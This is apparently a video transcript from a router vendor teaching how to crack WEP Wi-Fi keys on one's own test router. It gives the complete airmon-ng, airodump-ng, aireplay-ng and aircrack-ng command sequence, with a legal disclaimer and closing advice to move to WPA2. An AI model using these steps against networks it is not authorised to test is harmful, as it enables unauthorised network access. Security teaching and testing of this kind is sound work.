Hi, this instructional video will teach you
the steps required to crack WEP wi-fi passwords on most routers. Before we get started a disclaimer:
this guide is for educational purposes only. You should only attempt to crack passwords
on a device you own, or with the express consent of the owner. Failing to do so can constitute
a crime in many countries. Flashrouters is not responsible or liable for any misuse of
the information contained in this guide. To follow this guide you’ll require three
things. A wi-fi enabled router configured to use WEP
security. I’ll be using an ASUS RT-N66U router running Tomato firmware, but this will
work with just about any router using any firmware. A wi-fi card that supports linux drivers and
packet injection. You can look online for a list of supported devices; most likely your
built-in card does not support this capability. I’m using the TP-Link TL-WN722N wifi usb
adapter. It’s small, portable, and cheap. I recommend the High Gain model as this will
give you greater range. Finally you will need a Linux operating system.
The operating system can be installed as your primary OS, or in a multi-boot configuration,
or inside a virtual machine. You can even use a liveboot image and run it directly off
of a USB thumb drive. This guide assumes you are using Debian or a Debian based distro
such as Ubuntu. Any distro should work but the exact command line syntax may vary slightly.
I’ll be using the 64bit version of Debian 7.2 running inside VM-Ware player. Once your environment is configured, we can
start the cracking procedure. First we need to place our Wi-Fi adapter into monitoring
mode. Do this by running: airmon-ng start wlan0
Before we can go further we’ll need to record some information. First we need our host mac
address. Run ifconfig and note the mac address for wlan0.
Next we need some information about our target router. Run: airodump-ng –encrypt WEP mon0
for a few seconds. It will record all WEP secured routers within range. My router is
called cracktest. When you see your router you can press control+c to kill the command.
Write down the BSSID, Channel, and ESSID for your router.
Now we need to capture and record some data. Run: airodump-ng -c 8 –bssid AC:22:0B:D3:7A:88
-w output mon0. Let this run in the background while we open up some other command prompts.
Next we need to fake authentication with our router. To do this run the following command:
aireplay-ng -1 0 -e cracktest -a AC:22:0B:D3:7A:88 -h 56:20:bb:21:72:fd mon0 where the –e parameter
is the name of your router, the –a parameter is your router’s BSSID, and the –h parameter
is the host mac address. You’ll notice when I ran this command I
got an error telling me that I need to add this switch –ignore-negative-one. This is
due to a bug in my kernel drivers. You can either patch it or just add the switch at
the end. If it succeeds you should get a successful notification at the bottom.
Now we can start listening for ARP requests and re-inject them. Do this by running: aireplay-ng
-3 -b AC:22:0B:D3:7A:88 -h 56:20:bb:21:72:fd –ignore-negative-one mon0
Let this run for a while. What we’re looking for is a rapid increase in the amount of ARP
requests. Sometimes it takes a few seconds until they start to show so be patient.
In some cases after a while you may not see any ARP requests being generated. There are
advanced techniques to generate the data such as ChopChop and Fragmentation, but we won’t
be covering them here. Continue to let this command run and open
up another terminal. Now we’re ready for the last step. Run:
aircrack-ng -b AC:22:0B:D3:7A:88 output*.cap If you generated enough data this should run
very quickly. Otherwise it can take a few seconds. But when it’s finished you’ll
see that we successfully found our WEP key. This can be used now to connect to the router,
we just need to remove the colons. How can you protect yourself from an attack
this simple? Well first of all you should never use WEP under any circumstances. WPA
& WPA2 security should be used instead. There are some flaws in the way that many vendors
implement WPA which can make it equally as dangerous. An open source firmware such as
DD-WRT or Tomato that comes installed on all FlashRouters is a simple and effective way
to mitigate all known WEP and WPA attacks.